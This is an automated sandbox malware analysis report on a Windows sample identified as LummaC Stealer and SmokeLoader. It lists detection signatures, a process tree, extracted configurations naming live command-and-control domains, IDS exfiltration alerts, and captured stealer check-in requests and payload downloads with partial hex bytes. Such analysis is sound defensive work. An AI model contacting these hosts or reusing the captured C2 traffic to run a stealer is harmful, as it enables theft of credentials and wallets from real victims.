Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:1318516
MD5:ec1d1cd9d43698631ceb1157e680a00a
SHA1:fe62f6419edca78ed9ff69b7ce0251e0dfde76e6
SHA256:a131b5cb6dd4b0daeea80eda409b3957fc9d7d33b0a4058e19d28b9cdebb51b6
Tags:exe
Infos:

Detection

LummaC Stealer, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected LummaC Stealer
Yara detected AntiVM3
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches for user specific document files
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7580 cmdline: C:\Users\user\Desktop\file.exe MD5: EC1D1CD9D43698631CEB1157E680A00A)
    • explorer.exe (PID: 3000 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 6E11.exe (PID: 5172 cmdline: C:\Users\user\AppData\Local\Temp\6E11.exe MD5: 4527E3FE757DD266980F572C43F22EF3)
        • RegAsm.exe (PID: 6692 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 8FE9545E9F72E460723F484C304314AD)
      • EDBC.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\EDBC.exe MD5: 59E6F40D24C3EA84FA3BCF55B8F72C9D)
        • conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • AppLaunch.exe (PID: 1072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 4DF5F963C7E18F062E49870D0AFF8F6F)
        • WerFault.exe (PID: 6232 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 136 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • aueuggs (PID: 5856 cmdline: C:\Users\user\AppData\Roaming\aueuggs MD5: EC1D1CD9D43698631CEB1157E680A00A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["fiancejiveimp.fun", "fullppc.yz"], "Build Id": "rIwhoU--Elvin"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://gudintas.at/tmp/", "http://pik96.ru/tmp/", "http://rosatiauto.com/tmp/", "http://kingpirate.ru/tmp/"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\6E11.exeINDICATOR_EXE_Packed_DotNetReactorDetects executables packed with unregistered version of .NET ReactorditekSHen
  • 0x112b36:$s2: is protected by an unregistered version of .NET Reactor!" );</script>

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.950991871.0000000002500000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.900656340.0000000002320000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.3.file.exe.2330000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        15.3.aueuggs.2510000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          0.2.file.exe.2320e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            15.2.aueuggs.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              15.2.aueuggs.2500e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.3104.21.1.1849855802048093 10/03/23-09:55:18.464087
                SID:2048093
                Source Port:49855
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3172.67.137.12549842802048094 10/03/23-09:55:14.607034
                SID:2048094
                Source Port:49842
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3172.67.151.21949864802048094 10/03/23-09:55:20.960656
                SID:2048094
                Source Port:49864
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3104.21.1.1849859802048094 10/03/23-09:55:19.654804
                SID:2048094
                Source Port:49859
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3104.21.81.1749834802048094 10/03/23-09:55:12.695709
                SID:2048094
                Source Port:49834
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:91.227.16.22192.168.2.380498162018572 10/03/23-09:55:07.486428
                SID:2018572
                Source Port:80
                Destination Port:49816
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3104.21.1.1849921802048094 10/03/23-09:55:50.248359
                SID:2048094
                Source Port:49921
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3104.21.81.1749829802048093 10/03/23-09:55:12.132298
                SID:2048093
                Source Port:49829
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://kingpirate.ru/tmp/URL Reputation: Label: malware
                Source: http://pik96.ru/tmp/URL Reputation: Label: malware
                Source: http://gudintas.at/tmp/URL Reputation: Label: malware
                Source: http://malenursenect.fun/AAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/apilAvira URL Cloud: Label: malware
                Source: http://h170811.srv22.test-hf.su/186.exeAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/apiAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/8yPAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/apiQu-Avira URL Cloud: Label: malware
                Source: http://malenursenect.fun/Avira URL Cloud: Label: malware
                Source: http://malenursenect.fun/api9uUAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/QyAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/FyAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/apiHAvira URL Cloud: Label: malware
                Source: http://malenursenect.fun/0Avira URL Cloud: Label: malware
                Source: http://malenursenect.fun/api)t%Avira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\aueuggsAvira: detection malicious, Label: HEUR/AGEN.1312455
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeAvira: detection malicious, Label: HEUR/AGEN.1316997
                Found malware configuration
                Source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://gudintas.at/tmp/", "http://pik96.ru/tmp/", "http://rosatiauto.com/tmp/", "http://kingpirate.ru/tmp/"]}
                Source: 22.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["fiancejiveimp.fun", "fullppc.yz"], "Build Id": "rIwhoU--Elvin"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 34%
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Multi AV Scanner detection for domain / URL
                Source: gudintas.atVirustotal: Detection: 11%Perma Link
                Source: malenursenect.funVirustotal: Detection: 7%Perma Link
                Source: h170811.srv22.test-hf.suVirustotal: Detection: 8%Perma Link
                Source: fullppc.xyzVirustotal: Detection: 17%Perma Link
                Source: http://malenursenect.fun/Virustotal: Detection: 7%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\aueuggsReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Roaming\aueuggsVirustotal: Detection: 45%Perma Link
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\aueuggsJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\EDBC.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0FDE00 CryptGenRandom,__CxxThrowException@8,21_2_6F0FDE00
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0FDEE0 CryptReleaseContext,21_2_6F0FDEE0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0FDD20 CryptReleaseContext,21_2_6F0FDD20
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0FDBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,21_2_6F0FDBB0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0FD9D0 CryptAcquireContextA,GetLastError,21_2_6F0FD9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004385E8 _strlen,CryptStringToBinaryA,CryptStringToBinaryA,22_2_004385E8
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdb source: 6E11.exe, 00000015.00000002.1048413965.000000000300E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.900048356.00007FFA11431000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.900048356.00007FFA11431000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 6E11.exe, 00000015.00000002.1048474823.00000000045BA000.00000004.00000800.00020000.00000000.sdmp, 6E11.exe, 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmp, 6E11.exe, 00000015.00000002.1049278689.0000000005890000.00000004.08000000.00040000.00000000.sdmp, 6E11.exe, 00000015.00000002.1048474823.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.21.dr
                Source: Binary string: communication_program_compendium.pdb source: 6E11.exe, 00000015.00000000.1046466838.0000000000892000.00000002.00000001.01000000.00000008.sdmp, 6E11.exe.1.dr
                Source: Binary string: eex.pdb source: explorer.exe, 00000001.00000000.900048356.00007FFA11431000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdbu source: 6E11.exe, 00000015.00000002.1048413965.000000000300E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 6E11.exe, 00000015.00000002.1048474823.00000000044EC000.00000004.00000800.00020000.00000000.sdmp, 6E11.exe, 00000015.00000002.1048474823.0000000004678000.00000004.00000800.00020000.00000000.sdmp, 6E11.exe, 00000015.00000002.1049278689.000000000594A000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00456688 FindFirstFileExW,22_2_00456688
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0045673C FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_0045673C
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156C8B0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h21_2_015653D4
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h21_2_0156B4CD
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156C9C0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156C9B9
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156C8A8
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156CBD9
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156CBE0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156CAD0
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h21_2_0156CAC8

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 200.92.136.254 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: gudintas.at
                Source: C:\Windows\explorer.exeNetwork Connect: 211.181.24.133 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: h170811.srv22.test-hf.su
                Source: C:\Windows\explorer.exeNetwork Connect: 193.149.185.139 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 186.182.55.44 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 180.94.156.61 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 91.227.16.22 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 186.147.159.19 80Jump to behavior
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2018572 ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) 91.227.16.22:80 -> 192.168.2.3:49816
                Source: TrafficSnort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.3:49829 -> 104.21.81.17:80
                Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49834 -> 104.21.81.17:80
                Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49842 -> 172.67.137.125:80
                Source: TrafficSnort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.3:49855 -> 104.21.1.18:80
                Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49859 -> 104.21.1.18:80
                Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49864 -> 172.67.151.219:80
                Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49921 -> 104.21.1.18:80
                Performs DNS queries to domains with low reputation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDNS query: fullppc.xyz
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: fiancejiveimp.fun
                Source: Malware configuration extractorURLs: fullppc.yz
                Source: Malware configuration extractorURLs: http://gudintas.at/tmp/
                Source: Malware configuration extractorURLs: http://pik96.ru/tmp/
                Source: Malware configuration extractorURLs: http://rosatiauto.com/tmp/
                Source: Malware configuration extractorURLs: http://kingpirate.ru/tmp/
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: fiancejiveimp.funContent-Length: 54Cache-Control: no-cacheData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 72 49 77 68 6f 55 2d 2d 45 6c 76 69 6e 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=rIwhoU--Elvin&j=default&ver=4.0
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: malenursenect.funContent-Length: 61Cache-Control: no-cacheData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 50 72 54 69 4f 37 2d 2d 49 6e 73 74 61 6c 6c 42 65 73 74 32 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=PrTiO7--InstallBest2&j=default&ver=4.0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Tue, 03 Oct 2023 07:55:07 GMTContent-Type: application/octet-streamContent-Length: 3413536Connection: keep-aliveKeep-Alive: timeout=20Last-Modified: Tue, 03 Oct 2023 06:43:12 GMTETag: "341620-606ca345ebb95"Accept-Ranges: bytesX-Power-Supply-By: 220 VoltData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 d4 ac cf 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c4 31 00 00 c2 01 00 00 00 00 00 1e e3 31 00 00 20 00 00 00 00 32 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 33 00 00 02 00 00 a6 70 34 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 d0 e2 31 00 4b 00 00 00 00 00 32 00 18 bf 01 00 00 00 00 00 00 00 00 00 00 88 33 00 20 8e 00 00 00 c0 33 00 0c 00 00 00 6b e2 31 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 c3 31 00 00 20 00 00 00 c4 31 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 bf 01 00 00 00 32 00 00 c0 01 00 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 33 00 00 02 00 00 00 86 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 31 00 00 00 00 00 48 00 00 00 02 00 05 00 68 44 04 00 00 90 0d 00 03 00 00 00 81 00 00 06 68 d4 11 00 1b 0c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3a 2b 05 28 c5 cc 35 45 02 28 13 00 00 0a 2a 00 56 2b 05 28 bc 2c 0e 3f 00 02 28 14 00 00 0a 38 00 00 00 00 00 2a 00 00 42 2b 05 28 bf 1c 4a 3a 7e 01 00 00 04 14 fe 01 2a 00 00 00 36 2b 05 28 66 a6 36 61 7e 01 00 00 04 2a 00 00 13 30 03 00 a4 00 00 00 01 00 00 11 2b 05 28 2a ee 4d 65 38 1e 00 00 00 fe 0c 00 00 45 04 00 00 00 2f 00 00 00 4b 00 00 00 6b 00 00 00 4a 00 00 00 38 2a 00 00 00 73 15 00 00 0a 80 02 00 00 04 38 00 00 00 00 73 16 00 00 0a 80 03 00 00 04 20 01 00 00 00 16 39 c2 ff ff ff 26 38 b8 ff ff ff 73 17 00 00 0a 80 05 00 00 04 20 02 00 00 00 17 3a a7 ff ff ff 26 38 9d ff ff ff 2a 73 18 00 00 0a 80 04 00 00 04 20 00 00 00 00 17 3a 8b ff ff ff 26 20 00 00 00 00 38 80 ff ff ff 73 19 00 00 0a 80 06 00 00 04 20 03 00 00 00 38 6c ff ff ff 13 30 03 00 5a 00 00 00 02 00 00 11 2b 05 28 da 57 30 5c 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 27 00 00 00 05 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Oct 2023 07:55:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 03 Oct 2023 07:15:06 GMTETag: "98800-606caa6821478"Accept-Ranges: bytesContent-Length: 624640Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 6a 10 68 79 0b 7e 3b 79 0b 7e 3b 79 0b 7e 3b aa 79 7d 3a 72 0b 7e 3b aa 79 7b 3a e9 0b 7e 3b aa 79 7a 3a 6d 0b 7e 3b 36 77 7a 3a 68 0b 7e 3b aa 79 7f 3a 70 0b 7e 3b 79 0b 7f 3b f4 0b 7e 3b 36 77 7b 3a 47 0b 7e 3b 36 77 7d 3a 6f 0b 7e 3b b8 77 7b 3a 78 0b 7e 3b b8 77 7e 3a 78 0b 7e 3b b8 77 81 3b 78 0b 7e 3b b8 77 7c 3a 78 0b 7e 3b 52 69 63 68 79 0b 7e 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cc be 1b 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 78 01 00 00 18 08 00 00 00 00 00 88 62 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 09 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 1c 02 00 50 00 00 00 c0 1c 02 00 64 00 00 00 00 a0 09 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 68 19 00 00 b0 fb 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 01 00 18 00 00 00 f0 fa 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 76 01 00 00 10 00 00 00 78 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 96 00 00 00 90 01 00 00 96 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 65 07 00 00 30 02 00 00 5a 07 00 00 12 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 09 00 00 02 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 19 00 00 00 b0 09 00 00 1a 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtqsod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gudintas.at
